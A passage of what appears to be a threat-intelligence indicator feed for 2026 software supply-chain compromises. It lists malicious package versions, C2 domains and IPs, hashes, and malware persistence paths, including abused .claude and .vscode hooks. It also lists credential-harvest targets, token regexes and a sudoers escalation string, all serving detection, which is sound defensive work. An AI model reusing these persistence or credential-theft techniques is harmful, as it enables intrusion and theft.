"public.ecr.aws/aquasecurity/trivy:0.69.4", "note":
"~3hr exposure", "incident": "trivy"},

     
{"value": "docker.io/aquasec/trivy:0.69.5",
"note": "Mar 22", "incident": "trivy"},

     
{"value":
"sha256:f69a8a4180c43fc427532ddde34a256acbd041a0a07844cf7e4d3e0434e5bcd1",
"note": "aquasec/trivy:0.69.5 image digest",
"incident": "trivy"},

     
{"value": "docker.io/aquasec/trivy:0.69.6",
"note": "Mar 22", "incident": "trivy"},

     
{"value":
"sha256:dd8beb3b40df080b3fd7f9a0f5a1b02f3692f65c68980f46da8328ce8bb788ef",
"note": "aquasec/trivy:0.69.6 image digest",
"incident": "trivy"},

     
{"value": "docker.io/checkmarx/kics:latest",
"note": "Apr 22 ~1.5hr exposure", "incident":
"kics-docker"},

     
{"value": "docker.io/checkmarx/kics:v2.1.20",
"note": "Apr 22 overwritten", "incident":
"kics-docker"},

     
{"value": "docker.io/checkmarx/kics:v2.1.21",
"note": "Apr 22 new malicious tag", "incident":
"kics-docker"},

     
{"value": "docker.io/checkmarx/kics:alpine",
"note": "Apr 22 overwritten", "incident":
"kics-docker"},

     
{"value": "docker.io/checkmarx/kics:debian",
"note": "Apr 22 overwritten", "incident":
"kics-docker"},

     
{"value":
"ghcr.io/elementary-data/elementary:0.23.3", "note":
"Apr 24 ~11.5hr exposure", "incident":
"elementary-data"}

    ],

   
"pypi_packages": [

     
{"value": "litellm==1.82.7", "note":
"quarantined", "incident": "litellm"},

     
{"value": "litellm==1.82.8", "note":
"quarantined", "incident": "litellm"},

     
{"value": "telnyx==4.87.1", "note":
"malicious (Win bug)", "incident": "telnyx"},

     
{"value": "telnyx==4.87.2", "note":
"malicious", "incident": "telnyx"},

     
{"value": "xinference==2.6.0", "note":
"disputed TeamPCP attribution", "incident":
"xinference"},

     
{"value": "xinference==2.6.1", "note":
"disputed TeamPCP attribution", "incident":
"xinference"},

     
{"value": "xinference==2.6.2", "note":
"disputed TeamPCP attribution", "incident":
"xinference"},

     
{"value": "lightning==2.6.2", "note":
"PyTorch Lightning", "incident":
"mini-shai-hulud"},

     
{"value": "lightning==2.6.3", "note":
"PyTorch Lightning", "incident":
"mini-shai-hulud"},

     
{"value": "guardrails-ai==0.10.1", "note":
"Guardrails AI", "incident":
["mini-shai-hulud-2", "durabletask"]},

     
{"value": "durabletask==1.4.1", "note":
"Microsoft DurableTask SDK", "incident":
"durabletask"},

     
{"value": "durabletask==1.4.2", "note":
"Microsoft DurableTask SDK", "incident":
"durabletask"},

     
{"value": "durabletask==1.4.3", "note":
"Microsoft DurableTask SDK", "incident":
"durabletask"},

     
{"value": "mistralai==2.4.6", "note":
"Mistral AI Python client", "incident":
"mini-shai-hulud-2"},

     
{"value": "elementary-data==0.23.3",
"note": "~1.1M monthly downloads, ~11.5hr exposure",
"incident": "elementary-data"}

    ],

   
"npm_packages": [

     
{"value": "@EmilGroup/*", "note": "28
packages compromised", "incident": "canisterworm"},

     
{"value": "@opengov/*", "note": "16
packages compromised", "incident": "canisterworm"},

     
{"value": "@teale.io/[email protected]",
"note": "self-propagating variant", "incident":
"canisterworm"},

     
{"value": "@teale.io/[email protected]",
"note": "self-propagating variant", "incident":
"canisterworm"},

     
{"value": "@airtm/uuid-base32", "note":
"compromised", "incident": "canisterworm"},

     
{"value": "@pypestream/floating-ui-dom",
"note": "compromised", "incident":
"canisterworm"},

     
{"value": "@bitwarden/[email protected]",
"note": "cascading from KICS Docker", "incident":
"bitwarden"},

     
{"value": "[email protected]", "note":
"CanisterSprawl worm (Apr 21-22)", "incident":
"canistersprawl"},

     
{"value": "@automagik/[email protected]",
"note": "CanisterSprawl (Apr 21-22)", "incident":
"canistersprawl"},

     
{"value":
"@fairwords/[email protected]", "note":
"CanisterSprawl precursor (Apr 8)", "incident":
"canistersprawl"},

     
{"value": "@fairwords/[email protected]",
"note": "CanisterSprawl precursor (Apr 8)",
"incident": "canistersprawl"},

     
{"value": "@openwebconcept/[email protected]",
"note": "CanisterSprawl (Apr 21)", "incident":
"canistersprawl"},

     
{"value": "@openwebconcept/[email protected]",
"note": "CanisterSprawl (Apr 21)", "incident":
"canistersprawl"},

     
{"value": "@cap-js/[email protected]", "note":
"SAP package (~250k/wk)", "incident":
"mini-shai-hulud"},

     
{"value": "@cap-js/[email protected]",
"note": "SAP package (~10k/wk)", "incident":
"mini-shai-hulud"},

     
{"value": "@cap-js/[email protected]",
"note": "SAP package (~260k/wk)", "incident":
"mini-shai-hulud"},

     
{"value": "[email protected]", "note": "SAP
build tool (~52k/wk)", "incident": "mini-shai-hulud"},

     
{"value": "[email protected]", "note":
"cross-ecosystem spread", "incident":
"mini-shai-hulud"},

     
{"value": "@tanstack/[email protected]",
"note": "12M weekly downloads", "incident":
"mini-shai-hulud-2"},

     
{"value": "@tanstack/[email protected]",
"note": "12M weekly downloads", "incident":
"mini-shai-hulud-2"},

     
{"value": "@tanstack/[email protected]",
"note": "TanStack router core", "incident":
"mini-shai-hulud-2"},

     
{"value": "@tanstack/[email protected]",
"note": "TanStack router core", "incident":
"mini-shai-hulud-2"},

     
{"value": "@tanstack/*", "note": "40+
packages compromised", "incident":
"mini-shai-hulud-2"},

     
{"value": "@tanstack/[email protected]",
"note": "infected Nx Console contributor (2.3 MB obfuscated
harvester)", "source": "Nx Postmortem", "incident":
"mini-shai-hulud-2"},

     
{"value": "@uipath/*", "note": "70+
packages compromised", "incident":
"mini-shai-hulud-2"},

     
{"value": "@uipath/[email protected]",
"note": "UiPath enterprise automation",
"incident": "mini-shai-hulud-2"},

     
{"value": "@uipath/[email protected]", "note":
"UiPath CLI", "incident": "mini-shai-hulud-2"},

     
{"value": "@uipath/[email protected]",
"note": "UiPath agent SDK", "incident":
"mini-shai-hulud-2"},

     
{"value": "@mistralai/[email protected]",
"note": "Mistral AI TypeScript client",
"incident": "mini-shai-hulud-2"},

     
{"value": "@mistralai/[email protected]",
"note": "Mistral AI TypeScript client",
"incident": "mini-shai-hulud-2"},

     
{"value": "@mistralai/[email protected]",
"note": "Mistral AI TypeScript client",
"incident": "mini-shai-hulud-2"},

     
{"value": "@mistralai/[email protected]",
"note": "Mistral AI Azure client", "incident":
"mini-shai-hulud-2"},

     
{"value": "@mistralai/[email protected]",
"note": "Mistral AI Azure client", "incident":
"mini-shai-hulud-2"},

     
{"value": "@mistralai/[email protected]",
"note": "Mistral AI Azure client", "incident":
"mini-shai-hulud-2"},

     
{"value": "@mistralai/[email protected]",
"note": "Mistral AI GCP client", "incident":
"mini-shai-hulud-2"},

     
{"value": "@mistralai/[email protected]",
"note": "Mistral AI GCP client", "incident":
"mini-shai-hulud-2"},

     
{"value": "@mistralai/[email protected]",
"note": "Mistral AI GCP client", "incident":
"mini-shai-hulud-2"},

     
{"value": "@antv/*", "note": "323
packages compromised (639 versions)", "incident":
"antv"},

     
{"value": "@antv/[email protected]", "note":
"charting library", "incident": "antv"},

     
{"value": "@antv/[email protected]", "note":
"charting library", "incident": "antv"},

     
{"value": "@antv/g6", "note": "graph
visualization", "incident": "antv"},

     
{"value": "@antv/x6", "note":
"diagramming", "incident": "antv"},

     
{"value": "@antv/l7", "note":
"geospatial visualization", "incident": "antv"},

     
{"value": "@antv/s2", "note":
"multidimensional analytics", "incident":
"antv"},

     
{"value": "@antv/f2", "note": "mobile
charts", "incident": "antv"},

     
{"value": "@antv/g", "note":
"rendering engine", "incident": "antv"},

     
{"value": "@antv/g2plot", "note":
"chart library", "incident": "antv"},

     
{"value": "@antv/graphin", "note":
"graph analysis", "incident": "antv"},

     
{"value": "@antv/data-set", "note":
"data processing", "incident": "antv"},

     
{"value": "@antv/[email protected]", "note":
"scale utilities (~2.2M weekly)", "incident":
"antv"},

     
{"value": "@antv/[email protected]", "note":
"scale utilities", "incident": "antv"},

     
{"value": "[email protected]",
"note": "~1.1M weekly downloads", "incident":
"antv"},

     
{"value": "[email protected]",
"note": "~1.1M weekly downloads", "incident":
"antv"},

     
{"value": "[email protected]",
"note": "~1.1M weekly downloads", "incident":
"antv"},

     
{"value": "[email protected]", "note":
"~1.15M weekly downloads", "incident": "antv"},

     
{"value": "[email protected]", "note":
"~1.15M weekly downloads", "incident": "antv"},

     
{"value": "[email protected]", "note":
"~4.2M monthly downloads", "incident": "antv"},

     
{"value": "[email protected]", "note":
"~4.2M monthly downloads", "incident": "antv"},

     
{"value": "[email protected]", "note":
"~4.2M monthly downloads", "incident": "antv"},

     
{"value": "canvas-nest.js", "note":
"canvas animation", "incident": "antv"},

     
{"value": "jest-canvas-mock", "note":
"testing utility", "incident": "antv"},

     
{"value": "jest-date-mock", "note":
"testing utility", "incident": "antv"}

    ],

   
"vscode_extensions": [

     
{"value": "[email protected]",
"note": "Nx Console (2.2M installs, 11-min exposure)",
"incident": "antv"}

    ],

   
"packagist_packages": [

     
{"value": "intercom/[email protected]",
"note": "first npm→Packagist spread (20.7M lifetime)",
"incident": "mini-shai-hulud"}

    ]

  },

  "malware":
{

   
"attribution_strings": [

     
{"value": "TeamPCP Cloud stealer", "note":
"self-attribution", "incident": ["trivy",
"checkmarx", "litellm"]},

     
{"value": "tpcp.tar.gz", "note":
"exfil bundle", "incident": ["trivy",
"checkmarx", "litellm"]},

     
{"value": "tpcp-docs", "note":
"GitHub dead drop", "incident": ["trivy",
"checkmarx", "litellm"]},

     
{"value": "System Telemetry Service",
"note": "systemd unit display name", "incident":
"litellm"},

     
{"value": "Runner.Worker", "note":
"memory scrape target", "incident": "trivy"},

     
{"value": "# hacked by teampcp", "note":
"xinference comment marker (disputed)", "incident":
"xinference"},

     
{"value": "love.tar.gz", "note":
"xinference exfil bundle", "incident":
"xinference"},

     
{"value": "X-QT-SR: 14", "note":
"xinference exfil HTTP header", "incident":
"xinference"},

     
{"value": "Shai-Hulud: The Third Coming",
"note": "Bitwarden payload identifier",
"incident": "bitwarden"},

     
{"value": "A Mini Shai-Hulud has Appeared",
"note": "GitHub repo description", "incident":
"mini-shai-hulud"},

     
{"value": "OhNoWhatsGoingOnWithGitHub",
"note": "GitHub commit search marker",
"incident": "mini-shai-hulud"},

     
{"value": "EveryBoiWeBuildIsAWormyBoi",
"note": "PyTorch Lightning search marker",
"incident": "mini-shai-hulud"},

     
{"value": "beautifulcastle", "note":
"KICS binary fallback C2 URL resolution", "incident":
["kics-docker", "bitwarden", "mini-shai-hulud"]},

     
{"value": "LongLiveTheResistanceAgainstMachines",
"note": "VSCode payload fallback GitHub token acquisition",
"incident": ["kics-docker", "bitwarden"]},

     
{"value": "KICS-Telemetry/2.0", "note":
"User-Agent for KICS exfil", "incident":
"kics-docker"},

     
{"value": "claude
", "note": "spoofed
commit author", "incident": "mini-shai-hulud"},

     
{"value": "chore: update dependencies",
"note": "malicious commit message", "incident":
"mini-shai-hulud"},

     
{"value": "dependabout", "note":
"typosquat branch name (dependabot misspelling)",
"incident": "mini-shai-hulud"},

     
{"value": "firedalazer", "note":
"GitHub dead-drop C2 trigger keyword", "incident":
"antv"},

     
{"value": "niagA oG eW ereH :duluH-iahS",
"note": "exfil repo description (reversed: Shai-Hulud: Here We
Go Again)", "incident": "antv"},

     
{"value": "python-requests/2.31.0",
"note": "spoofed User-Agent for GitHub API calls",
"incident": "antv"},

     
{"value": "python-httpx/0.28.1", "note":
"attacker User-Agent (May 15 return visit)", "source":
"Nx Postmortem", "incident": "antv"},

     
{"value": "Run Copilot", "note":
"injected workflow name", "incident": "antv"},

     
{"value": "Build action for vX.Y.Z",
"note": "imposter commit message pattern (actions-cool)",
"incident": "antv"},

     
{"value": "New Package", "note":
"imposter commit message (antvis/G2, forged author huiyu.zjt)",
"incident": "antv"},

     
{"value": "format-results", "note":
"artifact name for secrets dump", "incident":
"antv"}

    ],

   
"persistence_paths": [

     
{"value": "~/.config/systemd/user/sysmon.py",
"note": "developer machines", "incident":
"litellm"},

     
{"value": "~/.config/sysmon/sysmon.js",
"note": "checkmarx-util via VSCode ext",
"incident": "checkmarx"},

     
{"value":
"/root/.config/systemd/user/sysmon.service", "note":
"KICS systemd", "incident": "checkmarx"},

     
{"value": "/var/lib/svc_internal/runner.py",
"note": "kamikaze v1", "incident":
["trivy", "canisterworm"]},

     
{"value":
"/etc/systemd/system/internal-monitor.service", "note":
"kamikaze v1", "incident": ["trivy",
"canisterworm"]},

     
{"value": "/var/lib/pgmon/pgmon.py",
"note": "kamikaze v3 worm", "incident":
["trivy", "canisterworm"]},

     
{"value": "/etc/systemd/system/pgmonitor.service",
"note": "kamikaze v3 worm", "incident":
["trivy", "canisterworm"]},

     
{"value": "~/.config/systemd/user/pgmon.service",
"note": "CanisterWorm npm", "incident":
"canisterworm"},

     
{"value": "~/.local/share/pgmon/service.py",
"note": "CanisterWorm backdoor", "incident":
"canisterworm"},

     
{"value": "~/.npmrc", "note":
"harvested for npm tokens", "incident":
"canisterworm"},

     
{"value": "/etc/npmrc", "note":
"harvested for npm tokens", "incident":
"canisterworm"},

     
{"value": "/tmp/.pg_state", "note":
"state tracking", "incident": ["trivy",
"canisterworm"]},

     
{"value": "/tmp/pglog", "note": "temp
staging", "incident": ["trivy",
"canisterworm"]},

     
{"value": "%APPDATA%\\Microsoft\\Windows\\Start
Menu\\Programs\\Startup\\msbuild.exe", "note": "Telnyx
Windows dropper (AdaptixC2)", "incident": "telnyx"},

     
{"value": "%APPDATA%\\Microsoft\\Windows\\Start
Menu\\Programs\\Startup\\msbuild.exe.lock", "note": "lock
file (12hr re-infection guard)", "incident": "telnyx"},

     
{"value": "dllhost.exe (spawned suspended)",
"type": "string", "note": "injection
target", "incident": "telnyx"},

     
{"value": "\\\\.\\pipe\\%08lx", "type":
"string", "note": "named pipe fallback C2",
"incident": "telnyx"},

     
{"value": "~/.config/audiomon/audiomon.py",
"note": "Telnyx Linux backdoor", "incident":
"telnyx"},

     
{"value": "~/.config/systemd/user/audiomon.service",
"note": "Telnyx Linux persistence", "incident":
"telnyx"},

     
{"value": "/tmp/.initd_state", "note":
"Telnyx state tracking", "incident": "telnyx"},

     
{"value": ".claude/router_runtime.js",
"note": "Mini Shai Hulud payload", "incident":
"mini-shai-hulud"},

     
{"value": ".claude/setup.mjs", "note":
"Mini Shai Hulud dropper", "incident":
"mini-shai-hulud"},

     
{"value": ".claude/settings.json", "note":
"SessionStart hook persistence", "incident":
"mini-shai-hulud"},

     
{"value": "~/.claude.json", "note":
"credential harvest target", "incident":
"bitwarden"},

     
{"value": "~/.kiro/settings/mcp.json",
"note": "credential harvest target", "incident":
"bitwarden"},

     
{"value": ".vscode/setup.mjs", "note":
"VS Code dropper", "incident":
"mini-shai-hulud"},

     
{"value": ".vscode/tasks.json", "note":
"folderOpen task persistence", "incident":
"mini-shai-hulud"},

     
{"value": "results/results-*.json",
"note": "exfil staging", "incident":
"mini-shai-hulud"},

     
{"value": "/tmp/tmp.987654321.lock",
"note": "instance lock file", "incident":
"mini-shai-hulud"},

     
{"value": "~/.config/gh/hosts.yml",
"note": "GitHub CLI token target (exercised within 74s)",
"source": "Nx Postmortem", "incident": ["mini-shai-hulud-2",
"antv"]},

     
{"value": "~/.local/share/kitty/cat.py",
"note": "Python backdoor (GitHub dead-drop C2)",
"incident": "antv"},

     
{"value":
"~/Library/LaunchAgents/com.user.kitty-monitor.plist",
"note": "macOS persistence (hourly trigger)",
"incident": "antv"},

     
{"value":
"~/.config/systemd/user/kitty-monitor.service", "note":
"Linux persistence", "incident": "antv"},

     
{"value": "/var/tmp/.gh_update_state",
"note": "anti-replay state file", "incident":
"antv"},

     
{"value": "/tmp/kitty-*", "note":
"staging directories", "incident": "antv"},

     
{"value": "~/.local/bin/gh-token-monitor.sh",
"note": "token polling daemon (60s interval)",
"incident": "antv"},

     
{"value": ".github/workflows/codeql.yml",
"note": "injected workflow (Run Copilot)",
"incident": "antv"},

     
{"value": "/tmp/managed.pyz", "note":
"initial payload", "incident": "durabletask"},

     
{"value": "/tmp/rope-*.pyz", "note":
"secondary payload", "incident": "durabletask"},

     
{"value": "~/.cache/.sys-update-check",
"note": "general infection marker", "incident":
"durabletask"},

     
{"value": "~/.cache/.sys-update-check-k8s",
"note": "Kubernetes infection marker",
"incident": "durabletask"},

     
{"value": "/tmp/.rope_state/ssm_instances.json",
"note": "SSM target tracking", "incident":
"durabletask"},

     
{"value": "/etc/systemd/system/pcpcat-gost.service",
"note": "SOCKS5 proxy persistence", "source":
"Rubrik Zero Labs", "incident": "pcpcat"},

     
{"value": "/etc/systemd/system/pcpcat-frp.service",
"note": "FRP tunnel persistence", "source":
"Rubrik Zero Labs", "incident": "pcpcat"},

     
{"value":
"/etc/systemd/system/pcpcat-scanner.service", "note":
"Docker/Ray scanner persistence", "source": "Rubrik
Zero Labs", "incident": "pcpcat"},

     
{"value":
"/etc/systemd/system/pcpcat-react.service", "note":
"CVE-2025-55182 scanner persistence", "source":
"Rubrik Zero Labs", "incident": "pcpcat"},

     
{"value":
"/etc/systemd/system/pcpcat-redis.service", "note":
"Redis exploit persistence", "source": "Rubrik Zero
Labs", "incident": "pcpcat"},

     
{"value":
"/etc/systemd/system/pcpcat-boring.service", "note":
"XMRig miner persistence", "source": "Rubrik Zero
Labs", "incident": "pcpcat"},

     
{"value": "/etc/cron.d/teampcp", "note":
"hourly proxy.sh cron", "source": "Rubrik Zero
Labs", "incident": "pcpcat"}

    ],

   
"injected_files": [

     
{"value": "cmd/trivy/main.go", "note":
"Trivy injection", "incident": "trivy"},

     
{"value": "cmd/trivy/scand.go", "note":
"Trivy injection", "incident": "trivy"}

    ],

   
"kubernetes": [

     
{"value": "host-provisioner-std", "note":
"DaemonSet", "incident": ["trivy",
"canisterworm"]},

     
{"value": "host-provisioner-iran", "note":
"DaemonSet (wiper)", "incident": ["trivy",
"canisterworm"]},

     
{"value": "kamikaze", "note":
"Container (hostPID: true)", "incident":
["trivy", "canisterworm"]},

     
{"value": "provisioner", "note":
"Container name", "incident": ["trivy",
"canisterworm"]},

     
{"value": "node-setup-*", "note":
"Privileged pod pattern", "incident": "litellm"},

     
{"value": "alpine:latest", "note":
"Image for host filesystem mount", "incident":
["litellm", "pcpcat"]},

     
{"value": "system-monitor", "note":
"DaemonSet in kube-system (hostNetwork, hostPID, privileged)",
"source": "Rubrik Zero Labs", "incident":
"pcpcat"},

     
{"value": "teampcp", "note": "Docker
container name (privileged, host network)", "source":
"Rubrik Zero Labs", "incident": "pcpcat"}

    ],

   
"network_behavior": [

     
{"value": "Scans ports 22, 2375 on local /24",
"note": "worm behavior", "incident":
["trivy", "canisterworm"]},

     
{"value": "/var/log/auth.log", "type":
"path", "note": "parsed for targets",
"incident": ["trivy", "canisterworm"]},

     
{"value": "youtube.com connectivity check",
"type": "string", "note": "kill switch
(50-min poll)", "incident": ["canisterworm", "litellm"]},

     
{"value": "POST /telemetry/checkmarx.json",
"type": "string", "note": "AdaptixC2 beacon
URI", "incident": "telnyx"},

     
{"value": "X-Content-ID header", "type":
"string", "note": "AdaptixC2 session header",
"incident": "telnyx"},

     
{"value": "Mozilla/5.0 (Windows NT 6.2; rv:20.0)
Gecko/20121202 Firefox/20.0", "type": "string",
"note": "AdaptixC2 User-Agent", "incident":
"telnyx"},

     
{"value": "Russian locale exit", "type":
"string", "note": "CIS avoidance — exits if ru_*
locale detected", "incident": ["bitwarden",
"mini-shai-hulud"]},

     
{"value": "POST /v1/telemetry", "type":
"string", "note": "Mini Shai Hulud exfil URI",
"incident": "mini-shai-hulud"},

     
{"value": "GitHub GraphQL API commit search",
"type": "string", "note": "dead-drop token
retrieval", "incident": "mini-shai-hulud"},

     
{"value": "bun run index.js", "type":
"string", "note": "preinstall hook trigger",
"incident": "antv"},

     
{"value": "/proc//mem read",
"type": "string", "note": "Runner.Worker
memory scraping", "incident": "antv"},

     
{"value": "169.254.169.254", "type":
"ip", "note": "AWS IMDS credential harvest",
"incident": "antv"},

     
{"value": "169.254.170.2", "type":
"ip", "note": "ECS container metadata harvest",
"incident": "antv"},

     
{"value": "127.0.0.1:8200", "type":
"url", "note": "Vault token harvest",
"incident": "antv"},

     
{"value": "gh[op]_[A-Za-z0-9]{36,}",
"type": "regex", "note": "GitHub PAT
pattern", "incident": "antv"},

     
{"value": "npm_[A-Za-z0-9]{36,}", "type":
"regex", "note": "npm token pattern",
"incident": "antv"},

     
{"value":
"registry.npmjs.org/-/npm/v1/oidc/token/exchange/package/",
"type": "url", "note": "npm OIDC token
exchange abuse", "incident": "antv"},

     
{"value": "runner ALL=(ALL) NOPASSWD:ALL",
"type": "string", "note": "sudoers privilege
escalation", "incident": "antv"},

     
{"value": "__DAEMONIZED=1", "type":
"envvar", "note": "persistence guard",
"incident": "antv"},

     
{"value": "NEXT_REDIRECT error exfil",
"type": "string", "note": "CVE-2025-55182
output exfil via X-Action-Redirect", "source": "Rubrik Zero
Labs", "incident": "pcpcat"}

    ],

   
"_dune_repo_pattern":
"--<3digits> (e.g.,
sardaukar-melange-472)",

   
"dune_repo_words": [

     
{"value": "sardaukar", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "mentat", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "fremen", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "atreides", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "harkonnen", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "gesserit", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "prescient", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "fedaykin", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "tleilaxu", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "siridar", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "kanly", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "sayyadina", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "ghola", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "powindah", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "prana", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "kralizec", "incident":
["mini-shai-hulud", "antv"]},

     
{"value": "sandworm", "incident":
"antv"},

     
{"value": "ornithopter", "incident":
"antv"},

     
{"value": "heighliner", "incident":
"antv"},

     
{"value": "stillsuit", "incident":
"antv"},

     
{"value": "lasgun", "incident":
"antv"},

     
{"value": "sietch", "incident":
"antv"},

     
{"value": "melange", "incident":
"antv"},

     
{"value": "thumper", "incident":
"antv"},

     
{"value": "navigator", "incident":
"antv"},

     
{"value": "futar", "incident":
"antv"},

     
{"value": "phibian", "incident":
"antv"},

     
{"value": "slig", "incident":
"antv"},

     
{"value": "cogitor", "incident":
"antv"},

     
{"value": "laza", "incident":
"antv"}

    ]

  }

}

 

Canisterworm

Network
Indicators
-
5

cloudflare tunnels

souls-entire-defined-routes.trycloudflare.com

investigation-launches-hearings-copying.trycloudflare.com

championships-peoples-point-cassette.trycloudflare.com

create-sensitivity-grad-sequence.trycloudflare.com

 

icp
canister

tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io

 

File
Hashes
-
7

canisterworm
malware

e9b1e069efc778c1e77fb3f5fcc3bd3580bbc810604cbf4347897ddb4b8c163b

61ff00a81b19624adaad425b9129ba2f312f4ab76fb5ddc2c628a5037d31a4ba

0c0d206d5e68c0cf64d57ffa8bc5b1dad54f2dda52f24e96e02e237498cb9c3a

c37c0ae9641d2e5329fcdee847a756bf1140fdb7f0b7c78a40fdc39055e7d926

f398f06eefcd3558c38820a397e3193856e4e6e7c67f81ecc8e533275284b152

7df6cef7ab9aae2ea08f2f872f6456b5d51d896ddda907a238cd6668ccdc4bb7

5e2ba7c4c53fa6e0cef58011acdd50682cf83fb7b989712d2fcf1b5173bad956

 

GitHub
Artifacts
-
6

npm
packages

@EmilGroup/*

@opengov/*

@teale.io/[email protected]

@teale.io/[email protected]

@airtm/uuid-base32

@pypestream/floating-ui-dom

 

Malware
Signatures
-
17

persistence
paths

/var/lib/svc_internal/runner.py

/etc/systemd/system/internal-monitor.service

/var/lib/pgmon/pgmon.py

/etc/systemd/system/pgmonitor.service

~/.config/systemd/user/pgmon.service

~/.local/share/pgmon/service.py

~/.npmrc

/etc/npmrc

/tmp/.pg_state

/tmp/pglog

 

kubernetes

host-provisioner-std

host-provisioner-iran

kamikaze

provisioner

 

network
behavior

Scans ports 22, 2375 on local /24

/var/log/auth.log

youtube.com connectivity check

Payload
Repositories

 

Canistersprawl

Network
Indicators
-
5

icp
canister

cjn37-uyaaa-aaaac-qgnva-cai.raw.icp0.io

 

canistersprawl c2

telemetry.api-monitor.com

 

canistersprawl hashes

c19c4574d09e60636425f9555d3b63e8cb5c9d63ceb1c982c35e5a310c97a839

834b6e5db5710b9308d0598978a0148a9dc832361f1fa0b7ad4343dcceba2812

87259b0d1d017ad8b8daa7c177c2d9f0940e457f8dd1ab3abab3681e433ca88e

 

GitHub
Artifacts
-
6

npm
packages

[email protected]

@automagik/[email protected]

@fairwords/[email protected]

@fairwords/[email protected]

@openwebconcept/[email protected]

@openwebconcept/[email protected]

 

Payload
Repositories

 

Checkmarx

Network
Indicators
-
2

kics c2

checkmarx.zone

83.142.209.11

 

File
Hashes
-
4

kics openvsx

527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90

65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d

744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0

0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c

 

GitHub
Artifacts
-
4

checkmarx
actions

Checkmarx/kics-github-action @ 121c38f

Checkmarx/ast-github-action @ aa52a82c

 

compromised
accounts

cx-plugins-releases

ast-phoenix

 

Malware
Signatures
-
5

attribution
strings

TeamPCP Cloud stealer

tpcp.tar.gz

tpcp-docs

 

persistence
paths

~/.config/sysmon/sysmon.js

/root/.config/systemd/user/sysmon.service

 

Payload
Repositories

 

Litellm

Network
Indicators
-
6

kics c2

checkmarx.zone

 

litellm c2

models.litellm.cloud

litellm.cloud

46.151.182.203

manpages.wtf

 

elementary
data markers

050afbe046d7545f5af1a0d3fcfbaf6e993fd93d487b431f09bc9e963c7220a135

 

File
Hashes
-
7

litellm
packages

8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2

d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb

8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea

d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

 

litellm malware

a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b

71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238

6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a

 

GitHub
Artifacts
-
4

litellm exfil

BerriAI/litellm @ fcaa823d

BerriAI/litellm-skills @ 81c851cc

 

pypi
packages

litellm==1.82.7

litellm==1.82.8

 

Malware
Signatures
-
8

attribution
strings

TeamPCP Cloud stealer

tpcp.tar.gz

tpcp-docs

System Telemetry Service

 

persistence
paths

~/.config/systemd/user/sysmon.py

 

kubernetes

node-setup-*

alpine:latest

 

network
behavior

youtube.com connectivity check

 

Payload
Repositories

 

Telnyx

Network
Indicators
-
3

telnyx c2

83.142.209.203

 

wav
delivery

83.142.209.203:8080/hangup.wav

83.142.209.203:8080/ringtone.wav

 

File
Hashes
-
17

litellm
malware

6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a

 

telnyx
packages

7321caa303fe96ded0492c747d2f353c4f7d17185656fe292ab0a59e2bd0b8d9

f66c1ea3b25ec95d0c6a07be92c761551e543a7b256f9c78a2ff781c77df7093

cd08115806662469bbedec4b03f8427b97c8a4b3bc1442dc18b72b4e19395fe3

a9235c0eb74a8e92e5a0150e055ee9dcdc6252a07785b6677a9ca831157833a5

 

telnyx malware

23b1ec58649170650110ecad96e5a9490d98146e105226a16d898fbe108139e5

ab4c4aebb52027bf3d2f6b2dcef593a1a2cff415774ea4711f7d6e0aa1451d4e

84edce66f09c55bbb44754411bde4b092288d172734df62fac20d6f794b3a2ec

5ce544a8db5d0b0953c966384858e4e8a017e7acba2f5f6d0ac8f529d59939d8

196b5e0e06424a02e360e28e08d7dcfab7ec8946af9477ca352c6cf6b7d4e9bd

e6912e3ec58120bf63edf2e4be6ff2f092c40cfbc655a12f4a463b2ef98d368e

e4e3b176c1255666024d90392e09466a23bf6e8740bf589c6d1ccf2dfff451a4

 

windows payload

7290353a3bc2b18e9ea574d3294b09e28edaa6b038285bb101cf09760f187dcd

dafc1cc5d39bc303562d8587b698b6351e843b77c01764efa8b423a36b88fa6d

7e270255567866d37ad56e3f06977b695e39530eede74a10a0848ba71560cb45

b92bd082bbd7d238089b2bb87d9cbf01be1bf8ab7213b67e9d27108e052ef75c

26b689749bc57991cbae2aab8ab6cf5acab6c64db4829ba2b1ced6c60d99a7a8

 

GitHub Artifacts- 2

pypi packages

telnyx==4.87.1

telnyx==4.87.2

 

Malware
Signatures-
10

persistence
paths

%APPDATA%\Microsoft\Windows\Start
Menu\Programs\Startup\msbuild.exe

%APPDATA%\Microsoft\Windows\Start
Menu\Programs\Startup\msbuild.exe.lock

dllhost.exe (spawned suspended)

\\.\pipe\%08lx

~/.config/audiomon/audiomon.py

~/.config/systemd/user/audiomon.service

/tmp/.initd_state

 

network
behavior

POST /telemetry/checkmarx.json

X-Content-ID header

Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202
Firefox/20.0

 

Payload
Repositories

 

Attacker

Network
Indicators
-
16

attacker
ops

170.62.100.245

209.159.147.239

154.47.29.12

103.75.11.59

 

nsa.cat

105.245.181.120

138.199.15.172

